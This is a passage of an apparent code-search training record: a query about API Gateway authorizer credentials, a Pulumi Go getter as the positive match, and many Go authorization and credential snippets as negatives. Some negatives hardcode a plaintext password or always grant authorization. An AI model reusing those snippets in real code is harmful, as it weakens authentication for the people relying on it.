"0.61175686", "0.6112261", "0.61066943", "0.6105741", "0.60983074", "0.60957074", "0.6094925", "0.60863084" ]
0.63920933
30
The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
func (r *Authorizer) AuthorizerCredentials() pulumi.StringOutput { return (pulumi.StringOutput)(r.s.State["authorizerCredentials"]) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (ccc ClientCredentialsConfig) Authorizer() (autorest.Authorizer, error) {\n\toauthConfig, err := adal.NewOAuthConfig(ccc.AADEndpoint, ccc.TenantID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tspToken, err := adal.NewServicePrincipalToken(*oauthConfig, ccc.ClientID, ccc.ClientSecret, ccc.Resource)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from client credentials: %v\", err)\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func (o *CredentialProviderAPI) Authorizer() runtime.Authorizer {\n\n\treturn nil\n\n}", "func (a Authorizer) AuthorizeRole(rw http.ResponseWriter, req *http.Request, role string) error {\n\treturn nil\n}", "func (a Authorizer) AuthorizeRole(rw http.ResponseWriter, req *http.Request, role string) error {\n\treturn nil\n}", "func (ccc ClientCredentialsConfig) Authorizer() (autorest.Authorizer, error) {\n\tif len(ccc.AuxTenants) == 0 {\n\t\tspToken, err := ccc.ServicePrincipalToken()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"failed to get SPT from client credentials: %v\", err)\n\t\t}\n\t\treturn autorest.NewBearerAuthorizer(spToken), nil\n\t}\n\tmtSPT, err := ccc.MultiTenantServicePrincipalToken()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get multitenant SPT from client credentials: %v\", err)\n\t}\n\treturn autorest.NewMultiTenantServicePrincipalTokenAuthorizer(mtSPT), nil\n}", "func (o LookupAuthorizerResultOutput) AuthorizerCredentials() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupAuthorizerResult) string { return v.AuthorizerCredentials }).(pulumi.StringOutput)\n}", "func (s *mockSession) Authorize(provider goth.Provider, params goth.Params) (string, error) {\n\ttok := params.Get(key.Role)\n\trequire.Equal(s.t, s.Role, tok)\n\treturn s.Session.Authorize(provider, params)\n}", "func Authorize(requiredRole string) func(http.Handler) http.Handler {\n\trequiredRole = strings.ToLower(requiredRole)\n\treturn func(next http.Handler) http.Handler {\n\t\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\t\tctx := r.Context()\n\n\t\t\tclaims, err := GetJWTClaims(ctx)\n\t\t\tif err != nil {\n\t\t\t\thttp.Error(w, err.Error(), http.StatusBadRequest)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// Check role inside of an array of roles in access token claims.\n\t\t\tvar role bool\n\t\t\tfor _, userRole := range claims.User_roles {\n\t\t\t\tif strings.EqualFold(requiredRole, userRole) {\n\t\t\t\t\trole = true\n\t\t\t\t}\n\t\t\t}\n\t\t\tif !role {\n\t\t\t\ts := fmt.Sprintf(\n\t\t\t\t\t\"you are not authorized for that action; get roles: %v, expected: %s\",\n\t\t\t\t\tclaims.User_roles,\n\t\t\t\t\trequiredRole,\n\t\t\t\t)\n\t\t\t\thttp.Error(w, s, http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tnext.ServeHTTP(w, r)\n\t\t})\n\t}\n}", "func (ups UsernamePasswordConfig) Authorizer() (autorest.Authorizer, error) {\n\tspToken, err := ups.ServicePrincipalToken()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from username and password auth: %v\", err)\n\t}\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func (settings FileSettings) ClientCredentialsAuthorizer(baseURI string) (autorest.Authorizer, error) {\n\tresource, err := settings.getResourceForToken(baseURI)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn settings.ClientCredentialsAuthorizerWithResource(resource)\n}", "func (ups UsernamePasswordConfig) Authorizer() (autorest.Authorizer, error) {\n\n\toauthConfig, err := adal.NewOAuthConfig(ups.AADEndpoint, ups.TenantID)\n\n\tspToken, err := adal.NewServicePrincipalTokenFromUsernamePassword(*oauthConfig, ups.ClientID, ups.Username, ups.Password, ups.Resource)\n\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from username and password auth: %v\", err)\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func AuthorizeJWT (claimedRoles []string) gin.HandlerFunc {\n return func (c *gin.Context) {\n authHeader := c.GetHeader(\"Authorization\")\n bearerJWT := authHeader[len(\"Bearer\"):]\n token, err := jwt.ValidateJWT(bearerJWT)\n if token.Valid {\n // check the claimed roles match at least one\n } else {\n log.Fatal(err)\n c.AbortWithStatus(http.StatusUnauthorized)\n }\n }\n}", "func GetAssumeRoleCredentials(awsClient Client, durationSeconds *int64, roleSessionName, roleArn *string) (*sts.Credentials, error) {\n\tassumeRoleOutput, err := awsClient.AssumeRole(&sts.AssumeRoleInput{\n\t\tDurationSeconds: durationSeconds,\n\t\tRoleSessionName: roleSessionName,\n\t\tRoleArn: roleArn,\n\t})\n\tif err != nil {\n\t\t// Get error details\n\t\tklog.Errorf(\"Failed to assume role: %v\", err)\n\n\t\treturn nil, err\n\t}\n\n\tif assumeRoleOutput == nil {\n\t\tklog.Errorf(\"Get assume role output nil %v\", awsv1alpha1.ErrFederationTokenOutputNil)\n\t\treturn nil, awsv1alpha1.ErrFederationTokenOutputNil\n\t}\n\n\treturn assumeRoleOutput.Credentials, nil\n}", "func Authorize(w http.ResponseWriter, r *http.Request, authorizer Authorizer) {\n\tauthReq, err := ParseAuthorizeRequest(r, authorizer.Decoder())\n\tif err != nil {\n\t\tAuthRequestError(w, r, authReq, err, authorizer.Encoder())\n\t\treturn\n\t}\n\tif authReq.RequestParam != \"\" && authorizer.RequestObjectSupported() {\n\t\tauthReq, err = ParseRequestObject(r.Context(), authReq, authorizer.Storage(), authorizer.Issuer())\n\t\tif err != nil {\n\t\t\tAuthRequestError(w, r, authReq, err, authorizer.Encoder())\n\t\t\treturn\n\t\t}\n\t}\n\tvalidation := ValidateAuthRequest\n\tif validater, ok := authorizer.(AuthorizeValidator); ok {\n\t\tvalidation = validater.ValidateAuthRequest\n\t}\n\tuserID, err := validation(r.Context(), authReq, authorizer.Storage(), authorizer.IDTokenHintVerifier())\n\tif err != nil {\n\t\tAuthRequestError(w, r, authReq, err, authorizer.Encoder())\n\t\treturn\n\t}\n\tif authReq.RequestParam != \"\" {\n\t\tAuthRequestError(w, r, authReq, oidc.ErrRequestNotSupported(), authorizer.Encoder())\n\t\treturn\n\t}\n\treq, err := authorizer.Storage().CreateAuthRequest(r.Context(), authReq, userID)\n\tif err != nil {\n\t\tAuthRequestError(w, r, authReq, oidc.DefaultToServerError(err, \"unable to save auth request\"), authorizer.Encoder())\n\t\treturn\n\t}\n\tclient, err := authorizer.Storage().GetClientByClientID(r.Context(), req.GetClientID())\n\tif err != nil {\n\t\tAuthRequestError(w, r, req, oidc.DefaultToServerError(err, \"unable to retrieve client by id\"), authorizer.Encoder())\n\t\treturn\n\t}\n\tRedirectToLogin(req.GetID(), client, w, r)\n}", "func (client *Client) Authorize(password string) error {\n\tclient.Authorization = \"Basic \" + base64.StdEncoding.EncodeToString([]byte(\"admin:\"+password))\n\treturn client.MakeRequest(\"core/CheckAdminPassword\", nil, nil)\n}", "func getRoleCreds(client *sts.STS, roleArn string) (*sts.Credentials, error) {\n\tinput := new(sts.AssumeRoleInput).\n\t\tSetDurationSeconds(duration).\n\t\tSetRoleArn(roleArn).\n\t\tSetRoleSessionName(sessionName)\n\tif mfaToken != \"\" {\n\t\tinput.SetSerialNumber(mfaSerial).SetTokenCode(mfaToken)\n\t}\n\tresult, err := client.AssumeRole(input)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn result.Credentials, nil\n}", "func (self application) Authorize(f action, roles ...string) action {\n\treturn func(ctx *Context) error {\n\t\ttokenString, err := ctx.ReadCookie(config.ACCESS_TOKEN_NAME)\n\t\tif err != nil && err != http.ErrNoCookie {\n\t\t\tself.Logger.Error(fmt.Sprintf(\"%+v\\n\", err))\n\t\t\treturn NewErrUnauthorized()\n\t\t}\n\n\t\tif err == http.ErrNoCookie {\n\t\t\ttokenString = ctx.Request.Header.Get(config.AUTHORZIATION_NAME)\n\t\t\tif tokenString == \"\" {\n\t\t\t\treturn NewErrUnauthorized()\n\t\t\t}\n\t\t}\n\n\t\tkeyfunc := func(token *jwt.Token) (interface{}, error) {\n\t\t\treturn self.Config.JWT.Secret, nil\n\t\t}\n\t\tclaims := &Claims{}\n\t\ttoken, err := jwt.ParseWithClaims(tokenString, claims, keyfunc)\n\t\tif err != nil {\n\t\t\tself.Logger.Error(fmt.Sprintf(\"%+v\\n\", err))\n\t\t\treturn NewErrUnauthorized()\n\t\t}\n\n\t\tif !token.Valid {\n\t\t\troles, err := self.RefreshToken(ctx)\n\t\t\tif err == NewErrUnauthorized() {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err != nil {\n\t\t\t\tself.Logger.Error(fmt.Sprintf(\"%+v\\n\", err))\n\t\t\t\treturn NewErrUnauthorized()\n\t\t\t}\n\t\t\tclaims.Roles = roles\n\t\t}\n\n\t\tdoNext := false\n\t\textBreak := false\n\t\tif len(roles) > 0 {\n\t\t\tfor _, role := range roles {\n\t\t\t\tfor _, userRole := range claims.Roles {\n\t\t\t\t\tif role == userRole {\n\t\t\t\t\t\tdoNext = true\n\t\t\t\t\t\textBreak = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tif extBreak {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t\tif !doNext {\n\t\t\t\treturn NewErrForbidden()\n\t\t\t}\n\t\t}\n\n\t\treturn f(ctx)\n\t}\n}", "func (mc MSIConfig) Authorizer() (autorest.Authorizer, error) {\n\tspToken, err := mc.ServicePrincipalToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func (kv *AzureKeyVault) AuthorizeFromEnvironment() error {\n\tif os.Getenv(\"AZURE_TENANT_ID\") == \"\" {\n\t\treturn errors.New(\"AZURE_TENANT_ID environment variable not found\")\n\t}\n\n\tif os.Getenv(\"AZURE_CLIENT_ID\") == \"\" {\n\t\treturn errors.New(\"AZURE_CLIENT_ID environment variable not found\")\n\t}\n\n\tif os.Getenv(\"AZURE_CLIENT_SECRET\") == \"\" {\n\t\treturn errors.New(\"AZURE_CLIENT_SECRET environment variable not found\")\n\t}\n\n\tauthorizer, err := auth.NewAuthorizerFromEnvironment()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Error occurred while authorizing: %v\", err)\n\t}\n\n\tkv.client.Authorizer = authorizer\n\tkv.authenticated = true\n\n\treturn nil\n}", "func Authorize(loginRequest LoginRequest) error {\n\n\terr := ValidateToken(loginRequest.Token)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// password should be encrypted, and stored in a database.\n\tif loginRequest.Username != \"[email protected]\" || loginRequest.Password != \"#th@nH@rm#y#r!$100%D0p#\" {\n\t\treturn fmt.Errorf(\"Invalid credentials\")\n\t}\n\n\treturn nil\n}", "func (c *Client) Authorize(password string) error {\n\tvar args []byte\n\n\targs = combine(args, c.User)\n\targs = combine(args, \" \")\n\targs = combine(args, password)\n\n\treturn c.Send(MESSAGE_CLIENT_AUTH_USER, args)\n}", "func (c *S3Configuration) Credentials(accessKey, secretKey string) *S3Configuration {\n\tc.accessKey = accessKey\n\tc.secretKey = secretKey\n\treturn c\n}", "func (c *BaseAwsClient) RoleDetails() (*RoleDetails, error) {\n\treturn c.roleDetails()\n}", "func (p *PrincipalMock) AuthorizedRoles() []string {\n\treturn p.AuthorizedRoles()\n}", "func Authorizer(ctx workflow.Context, evt events.APIGatewayCustomAuthorizerRequest) (err error) {\n\tauthService := new(services.AuthService)\n\tres, err := authService.GetAuthorizerResponse(evt)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tctx.SetRawResponse(res)\n\treturn nil\n}", "func (analytics *Analytics) Authorize(ctx aero.Context, action string) error {\n\treturn AuthorizeIfLoggedIn(ctx)\n}", "func (p *AssumeRoleProvider) Retrieve(ctx context.Context) (aws.Credentials, error) {\n\t// Apply defaults where parameters are not set.\n\tif len(p.options.RoleSessionName) == 0 {\n\t\t// Try to work out a role name that will hopefully end up unique.\n\t\tp.options.RoleSessionName = fmt.Sprintf(\"aws-go-sdk-%d\", time.Now().UTC().UnixNano())\n\t}\n\tif p.options.Duration == 0 {\n\t\t// Expire as often as AWS permits.\n\t\tp.options.Duration = DefaultDuration\n\t}\n\tinput := &sts.AssumeRoleInput{\n\t\tDurationSeconds: aws.Int32(int32(p.options.Duration / time.Second)),\n\t\tPolicyArns: p.options.PolicyARNs,\n\t\tRoleArn: aws.String(p.options.RoleARN),\n\t\tRoleSessionName: aws.String(p.options.RoleSessionName),\n\t\tExternalId: p.options.ExternalID,\n\t\tSourceIdentity: p.options.SourceIdentity,\n\t\tTags: p.options.Tags,\n\t\tTransitiveTagKeys: p.options.TransitiveTagKeys,\n\t}\n\tif p.options.Policy != nil {\n\t\tinput.Policy = p.options.Policy\n\t}\n\tif p.options.SerialNumber != nil {\n\t\tif p.options.TokenProvider != nil {\n\t\t\tinput.SerialNumber = p.options.SerialNumber\n\t\t\tcode, err := p.options.TokenProvider()\n\t\t\tif err != nil {\n\t\t\t\treturn aws.Credentials{}, err\n\t\t\t}\n\t\t\tinput.TokenCode = aws.String(code)\n\t\t} else {\n\t\t\treturn aws.Credentials{}, fmt.Errorf(\"assume role with MFA enabled, but TokenProvider is not set\")\n\t\t}\n\t}\n\n\tresp, err := p.options.Client.AssumeRole(ctx, input)\n\tif err != nil {\n\t\treturn aws.Credentials{Source: ProviderName}, err\n\t}\n\n\treturn aws.Credentials{\n\t\tAccessKeyID: *resp.Credentials.AccessKeyId,\n\t\tSecretAccessKey: *resp.Credentials.SecretAccessKey,\n\t\tSessionToken: *resp.Credentials.SessionToken,\n\t\tSource: ProviderName,\n\n\t\tCanExpire: true,\n\t\tExpires: *resp.Credentials.Expiration,\n\t}, nil\n}", "func Credentials(request *restful.Request) (string, string, error) {\n\tencoded := request.Request.Header.Get(\"Authorization\")\n\tif len(encoded) > 6 {\n\t\t// [6:] extracts the hash\n\t\treturn decodeCredentials(encoded[6:])\n\t}\n\treturn \"\", \"\", fmt.Errorf(\"[credentials] No credentials found (%v)\\n\", encoded)\n}", "func (mc MSIConfig) Authorizer() (autorest.Authorizer, error) {\n\tmsiEndpoint, err := adal.GetMSIVMEndpoint()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tspToken, err := adal.NewServicePrincipalTokenFromMSI(msiEndpoint, mc.Resource)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from MSI: %v\", err)\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func Authorizer(userService userService, jwtService jwtService) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\taccessToken := extractToken(c)\n\t\tif accessToken == EmptyToken {\n\t\t\tabort(c, http.StatusBadRequest, \"Authorization header is missing or empty\")\n\t\t} else {\n\t\t\tparseJwt, err := jwtService.ParseJwt(accessToken)\n\n\t\t\tif err != nil {\n\t\t\t\tabort(c, http.StatusBadRequest, err.Error())\n\t\t\t} else if err := userVerification(c, parseJwt, userService); err != nil {\n\t\t\t\tabort(c, http.StatusUnauthorized, \"Unauthorized\")\n\t\t\t}\n\t\t}\n\t}\n}", "func GetCredentialsSecret(coreClient client.Client, namespace string, secretName string) (*Creds, error) {\n\tvar credentialsSecret apicorev1.Secret\n\tkey := client.ObjectKey{Namespace: namespace, Name: secretName}\n\n\tif err := coreClient.Get(context.Background(), key, &credentialsSecret); err != nil {\n\t\tif errors.IsNotFound(err) {\n\t\t\treturn nil, fmt.Errorf(\n\t\t\t\t\"error credentials secret %s not found in namespace %s: %w\", secretName, namespace, err)\n\t\t}\n\t\treturn nil, fmt.Errorf(\n\t\t\t\"error getting credentials secret %s in namespace %s: %w\", secretName, namespace, err)\n\t}\n\n\to := Creds{}\n\to.URL = string(credentialsSecret.Data[UrlField])\n\to.Username = string(credentialsSecret.Data[UsernameField])\n\to.Password = string(credentialsSecret.Data[PasswordField])\n\to.CAFile = string(credentialsSecret.Data[CafileField])\n\tinsecure, err := strconv.ParseBool(string(credentialsSecret.Data[InsecureField]))\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to identify %s in credentials %w\", InsecureField, err)\n\t}\n\to.Insecure = insecure\n\to.CABundle = string(credentialsSecret.Data[CaBundleField])\n\n\t// write CA bundle to a file if exist.\n\t// its best if we could mount the secret into a file,\n\t// but this controller deployment cannot\n\tif o.CABundle != \"\" {\n\t\tcaFilePath, err := writeCA(strings.NewReader(o.CABundle))\n\t\tif err != nil {\n\t\t\tklog.Errorf(\"failed to extract and store the CA %s\", err)\n\t\t\treturn nil, err\n\t\t}\n\t\to.CAFile = caFilePath\n\t}\n\treturn &o, nil\n}", "func (p *AssumeRoleProvider) Retrieve(ctx context.Context) (aws.Credentials, error) {\n\trole, err := p.RetrieveStsCredentials(ctx)\n\tif err != nil {\n\t\treturn aws.Credentials{}, err\n\t}\n\n\treturn aws.Credentials{\n\t\tAccessKeyID: *role.AccessKeyId,\n\t\tSecretAccessKey: *role.SecretAccessKey,\n\t\tSessionToken: *role.SessionToken,\n\t\tCanExpire: true,\n\t\tExpires: *role.Expiration,\n\t}, nil\n}", "func (settings FileSettings) ClientCredentialsAuthorizerWithResource(resource string) (autorest.Authorizer, error) {\n\tspToken, err := settings.ServicePrincipalTokenFromClientCredentialsWithResource(resource)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func (m *Manager) GetCredentials() map[string]interface{} {\n\treturn map[string]interface{}{\"user\": m.user.User, \"pass\": m.user.Pass}\n}", "func (company *Company) Authorize(ctx aero.Context, action string) error {\n\tuser := GetUserFromContext(ctx)\n\n\tif user == nil {\n\t\treturn errors.New(\"Not logged in\")\n\t}\n\n\tif user.Role != \"editor\" && user.Role != \"admin\" {\n\t\treturn errors.New(\"Insufficient permissions\")\n\t}\n\n\treturn nil\n}", "func (s *ClusterScope) Authorizer() autorest.Authorizer {\n\treturn s.AzureClients.Authorizer\n}", "func AuthorizeMiddleware(storeUser *models.UserStore) (mw func(http.Handler) http.Handler) {\n\tmw = func(h http.Handler) http.Handler {\n\t\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\n\t\t\tuserId := gorillaContext.Get(r, \"id\").(int)\n\t\t\trole, _ := storeUser.GetUserRole(userId)\n\t\t\tif role == \"\" {\n\t\t\t\thttp.Redirect(w, r, \"/role\", http.StatusSeeOther)\n\t\t\t\treturn\n\t\t\t}\n\t\t\tgorillaContext.Set(r, \"role\", role)\n\t\t\th.ServeHTTP(w, r)\n\t\t})\n\t}\n\treturn\n}", "func (c *Config) Authorize(ctx context.Context, uid string, state string) (*APIResponse, error) {\n\tv := url.Values{}\n\tv.Add(\"client_id\", c.clientID)\n\tv.Add(\"client_secret\", c.clientSecret)\n\tv.Add(\"uid\", uid)\n\tv.Add(\"state\", state)\n\n\treturn c.request(ctx, \"/api_neauth\", nil, v)\n}", "func (a *authorizer) Authorize(method string, r model.Role) bool {\n\tswitch method {\n\tcase \"/pipe.api.service.webservice.WebService/AddEnvironment\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/UpdateEnvironmentDesc\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/RegisterPiped\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/RecreatePipedKey\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/EnablePiped\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/DisablePiped\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/AddApplication\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/EnableApplication\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/DisableApplication\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/UpdateProjectStaticAdmin\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/EnableStaticAdmin\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/DisableStaticAdmin\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/UpdateProjectSSOConfig\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/UpdateProjectRBACConfig\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/SyncApplication\":\n\t\treturn isAdmin(r) || isEditor(r)\n\tcase \"/pipe.api.service.webservice.WebService/CancelDeployment\":\n\t\treturn isAdmin(r) || isEditor(r)\n\tcase \"/pipe.api.service.webservice.WebService/ApproveStage\":\n\t\treturn isAdmin(r) || isEditor(r)\n\tcase \"/pipe.api.service.webservice.WebService/GenerateApplicationSealedSecret\":\n\t\treturn isAdmin(r) || isEditor(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetApplicationLiveState\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetProject\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetCommand\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListDeploymentConfigTemplates\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListEnvironments\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListPipeds\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetPiped\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListApplications\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetApplication\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListDeployments\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetDeployment\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetStageLog\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetMe\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\t}\n\treturn false\n}", "func (b *BasicAuthorizer) Authorize(r *http.Request) (err error) {\n\tvar username, password string\n\n\tif username, password, err = b.GetBasicAuth(r); err != nil {\n\t\treturn\n\t}\n\n\tif username != b.config.Username || password != b.config.Password {\n\t\treturn ErrUnauthorized\n\t}\n\n\treturn\n}", "func (authClient *AuthClient) Authorize(guildID, userID, command, action string) bool {\n\treturn true\n}", "func (c *BaseAwsClient) Roles(user ...string) (identity.Roles, error) {\n\treturn c.roles()\n}", "func (u *User) Authorize(secret string) error {\n\n\t// convert the HEX-encoded hash from string to []byte\n\tbHash, err := hex.DecodeString(u.HashedSecret)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Internal error. Could not convert secret hash from string to binary format. %s\", err)\n\t}\n\n\terr = bcrypt.CompareHashAndPassword(bHash, []byte(secret))\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Authorization failure. Password does not match hashed secret for GUID '%s'. %s\", u.GUID, err)\n\t}\n\n\treturn nil\n}", "func GetAccessKey(ctx *pulumi.Context) string {\n\treturn config.Get(ctx, \"aws:accessKey\")\n}", "func (o *WeaviateAPI) Authorizer() runtime.Authorizer {\n\treturn o.APIAuthorizer\n}", "func Authorize(c *fiber.Ctx) {\n\tauthHeader := c.Get(\"Authorization\")\n\ttoken := strings.TrimPrefix(authHeader, \"Bearer \")\n\n\tplayerID, err := auth.GetPlayerIDFromAccessToken(token)\n\tif err != nil {\n\t\tfmt.Printf(\"Player token (%s) parse error: %s\\n\", token, err)\n\t\tc.SendStatus(403)\n\t\tc.JSON(utils.FormatErrors(err))\n\t\treturn\n\t}\n\n\t// add playerID to context\n\tc.Locals(\"playerID\", playerID)\n\tc.Locals(\"token\", token)\n\tc.Next(nil)\n}", "func Authorize(req *http.Request, r render.Render, db *sql.DB) {\n\tapikey := req.URL.Query().Get(PARAM_API_KEY)\n\n\tif apikey == \"\" {\n\t\tSendErrorAsJSON(403, \"Not Authorized - Missing API Key\", r)\n\t} else {\n\t\tif CheckAPIKeyValid(apikey, db) {\n\t\t\treturn\n\t\t} else {\n\t\t\tSendErrorAsJSON(403, \"Not Authorized - Invalid API Key\", r)\n\t\t}\n\t}\n}", "func Authorize() gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\n\t\tprovider, err := oidc.NewProvider(c, \"https://login.microsoftonline.com/5ab9af9b-4534-4c31-8e50-1e098461481c/v2.0\")\n\t\tif err != nil {\n\t\t\tlog.Println((err))\n\t\t\tc.AbortWithStatusJSON(http.StatusOK, gin.H{\n\t\t\t\t\"Auth\": \"Error getting provider\",\n\t\t\t})\n\t\t\treturn\n\t\t}\n\n\t\trawIDToken := strings.Trim(strings.TrimLeft(c.GetHeader(\"authorization\"), \"Bearer\"), \" \")\n\n\t\tverifier := provider.Verifier(&oidc.Config{ClientID: setting.AppSetting.ClientID})\n\n\t\t// Parse and verify ID Token payload.\n\t\tidToken, err := verifier.Verify(c, rawIDToken)\n\t\tif err != nil {\n\t\t\tc.AbortWithStatusJSON(http.StatusOK, gin.H{\n\t\t\t\t\"Token\": \"Invalid Token\",\n\t\t\t})\n\t\t\tc.Abort()\n\t\t\treturn\n\t\t}\n\n\t\t// Extract custom claims\n\t\tvar claims struct {\n\t\t\tName string `json:\"name\"`\n\t\t\tEmail string `json:\"preferred_username\"`\n\t\t}\n\t\tif err := idToken.Claims(&claims); err != nil {\n\t\t\tlog.Println(err)\n\t\t\tc.AbortWithStatusJSON(http.StatusOK, gin.H{\n\t\t\t\t\"Claims\": \"Error extracting custom claims\",\n\t\t\t})\n\n\t\t}\n\n\t\tc.Set(\"userEmail\", claims.Email)\n\t\tc.Set(\"userName\", claims.Name)\n\n\t\tc.Next()\n\t}\n}", "func (o *GetCredentialsResponseCredential) GetAccessKey() string {\n\tif o == nil || o.AccessKey == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.AccessKey\n}", "func credentials() *centrifuge.Credentials {\n\t// Never show secret to client of your application. Keep it on your application backend only.\n\tsecret := \"secret\"\n\t// Application user ID.\n\tuser := \"42\"\n\t// Current timestamp as string.\n\ttimestamp := centrifuge.Timestamp()\n\t// Empty info.\n\tinfo := \"\"\n\t// Generate client token so Centrifugo server can trust connection parameters received from client.\n\ttoken := auth.GenerateClientToken(secret, user, timestamp, info)\n\n\treturn &centrifuge.Credentials{\n\t\tUser: user,\n\t\tTimestamp: timestamp,\n\t\tInfo: info,\n\t\tToken: token,\n\t}\n}", "func Authorized(c *gin.Context) {\n\t_, exists := c.Get(\"user\")\n\tif !exists {\n\t\tc.AbortWithStatusJSON(401, gin.H{\n\t\t\t\"status\": false,\n\t\t\t\"message\": \"Unauthorization!!\",\n\t\t})\n\n\t\treturn\n\t}\n}", "func (o *CloudTidesAPI) Authorizer() runtime.Authorizer {\n\treturn nil\n}", "func Authorize(w http.ResponseWriter, r *http.Request, next http.HandlerFunc) {\n\n\t// Get token from request\n\ttoken, err := request.ParseFromRequestWithClaims(r, request.OAuth2Extractor, &AppClaims{}, func(token *jwt.Token) (interface{}, error) {\n\t\t// since we only use the one private key to sign the tokens,\n\t\t// we also only use its public counter part to verify\n\t\treturn verifyKey, nil\n\t})\n\n\tif err != nil {\n\t\tswitch err.(type) {\n\n\t\tcase *jwt.ValidationError: // JWT validation error\n\t\t\tvErr := err.(*jwt.ValidationError)\n\n\t\t\tswitch vErr.Errors {\n\t\t\tcase jwt.ValidationErrorExpired: //JWT expired\n\t\t\t\tutils.DisplayAppError(\n\t\t\t\t\tw,\n\t\t\t\t\terr,\n\t\t\t\t\t\"Access Token is expired, get a new Token\",\n\t\t\t\t\t401,\n\t\t\t\t)\n\t\t\t\treturn\n\n\t\t\tdefault:\n\t\t\t\tutils.DisplayAppError(w,\n\t\t\t\t\terr,\n\t\t\t\t\t\"Error while parsing the Access Token!\",\n\t\t\t\t\t500,\n\t\t\t\t)\n\t\t\t\treturn\n\t\t\t}\n\n\t\tdefault:\n\t\t\tutils.DisplayAppError(w,\n\t\t\t\terr,\n\t\t\t\t\"Error while parsing Access Token!\",\n\t\t\t\t500)\n\t\t\treturn\n\t\t}\n\n\t}\n\tif token.Valid {\n\t\t// Using context: https://joeshaw.org/revisiting-context-and-http-handler-for-go-17/\n\t\tcontextWithUserEmail := context.WithValue(r.Context(), ContextUserEmailKey, token.Claims.(*AppClaims).CurrentUserEmail)\n\t\tnext.ServeHTTP(w, r.WithContext(contextWithUserEmail))\n\t} else 